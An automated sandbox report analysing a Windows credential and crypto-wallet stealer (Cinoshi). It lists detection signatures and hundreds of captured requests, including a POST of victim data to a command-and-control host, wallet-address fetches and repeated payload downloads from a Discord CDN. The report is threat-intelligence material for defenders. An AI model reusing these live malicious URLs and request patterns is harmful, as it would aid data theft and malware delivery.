Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LnSNtO8JIa.exe

Overview

General Information

Sample name:LnSNtO8JIa.exe
renamed because original name is a hash value
Original sample name:c4d558acc94162490f5048e29fdba96f.exe
Analysis ID:1369655
MD5:c4d558acc94162490f5048e29fdba96f
SHA1:62c3e55c500a5ec72568591ea7873288951c7b25
SHA256:3d7066dda89f31d017e8d9cb6131f14f3aab9ec7cdb8d997a7d8198adf197180
Tags:exe
Infos:

Detection

Cinoshi Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Cinoshi Stealer
Contains functionality to capture screen (.Net source)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • LnSNtO8JIa.exe (PID: 3172 cmdline: C:\Users\user\Desktop\LnSNtO8JIa.exe MD5: C4D558ACC94162490F5048E29FDBA96F)
  • Chrome.exe (PID: 27288 cmdline: "C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe" MD5: C4D558ACC94162490F5048E29FDBA96F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: LnSNtO8JIa.exe PID: 3172JoeSecurity_CinoshiStealerYara detected Cinoshi StealerJoe Security
      Process Memory Space: LnSNtO8JIa.exe PID: 3172JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: LnSNtO8JIa.exeAvira: detected
        Antivirus detection for URL or domain
        Source: https://central-cee-doja.ru//list.php?id=1081Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/getwallet.php?id=1081&wallet=btcAvira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/dlls/x64/SQLite.Interop.dllAvira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/getwallet.php?id=1081&wallet=ethAvira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru//dd.php?id=1081Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/getwallet.php?id=1081&wallet=xmrAvira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ruAvira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru//ferr.php?id=1081Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/dlls/x86/SQLite.Interop.dllAvira URL Cloud: Label: malware
        Source: http://central-cee-doja.ruAvira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru//list.php?idhAvira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru//antivm.php?id=1081Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru/cin.php?ownerid=1081&buildid=am&countp=0&countc=2&username=user&country=US&ipaddr=102.165.48.52&BSSID=C059624A05&countw=0&rndtoken=clerleq-67127178950&domaindetects=0Avira URL Cloud: Label: malware
        Source: https://central-cee-doja.ru//list.php?id=1081dAvira URL Cloud: Label: malware
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeAvira: detection malicious, Label: HEUR/AGEN.1307175
        Multi AV Scanner detection for domain / URL
        Source: central-cee-doja.ruVirustotal: Detection: 15%Perma Link
        Source: https://central-cee-doja.ru/Virustotal: Detection: 15%Perma Link
        Source: http://central-cee-doja.ruVirustotal: Detection: 15%Perma Link
        Source: https://central-cee-doja.ruVirustotal: Detection: 15%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeReversingLabs: Detection: 61%
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeVirustotal: Detection: 60%Perma Link
        Multi AV Scanner detection for submitted file
        Source: LnSNtO8JIa.exeReversingLabs: Detection: 61%
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: LnSNtO8JIa.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E5C60 sqlite3_cryptoapi_init,CryptAcquireContextW,GetLastError,SI1c7a7970970b9619,CryptReleaseContext,SIfc350ae509dc2b53,0_2_6C3E5C60
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E5DC0 CryptReleaseContext,SIfc350ae509dc2b53,0_2_6C3E5DC0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3E5E00 SI4abff63f9a080046,SIea8388f7613ed158,SI4abff63f9a080046,SIea8388f7613ed158,CryptCreateHash,GetLastError,SI1c7a7970970b9619,SIca6f27da046939cc,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,SI6e539204336d5b4b,SI943321d364f02e5d,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,SIfca3960780d005fa,SIfc350ae509dc2b53,SIfc350ae509dc2b53,CryptDestroyKey,CryptDestroyHash,SI4987aea8bdedf163,0_2_6C3E5E00
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.6:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.6:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49847 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49936 version: TLS 1.2
        Source: LnSNtO8JIa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: Silk.pdb source: LnSNtO8JIa.exe, Chrome.exe.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: System.Data.SQLite.Linq.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3371371911.0000000006C32000.00000002.00000001.01000000.00000007.sdmp, System.Data.SQLite.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: SQLite.Interop.dll0.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb| source: LnSNtO8JIa.exe, 00000000.00000002.3371371911.0000000006C32000.00000002.00000001.01000000.00000007.sdmp, System.Data.SQLite.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: System.Data.SQLite.EF6.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: System.Data.SQLite.EF6.dll.0.dr
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3DE0B5 FindFirstFileExA,0_2_6C3DE0B5
        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //antivm.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlls/System.Data.SQLite.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /dlls/x86/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /dlls/x64/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //dd.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /cin.php?ownerid=1081&buildid=am&countp=0&countc=2&username=user&country=US&ipaddr=102.165.48.52&BSSID=C059624A05&countw=0&rndtoken=clerleq-67127178950&domaindetects=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dc0d8dd4952647Host: central-cee-doja.ruContent-Length: 99225Expect: 100-continue
        Source: global trafficHTTP traffic detected: GET //ferr.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=eth HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=eth HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
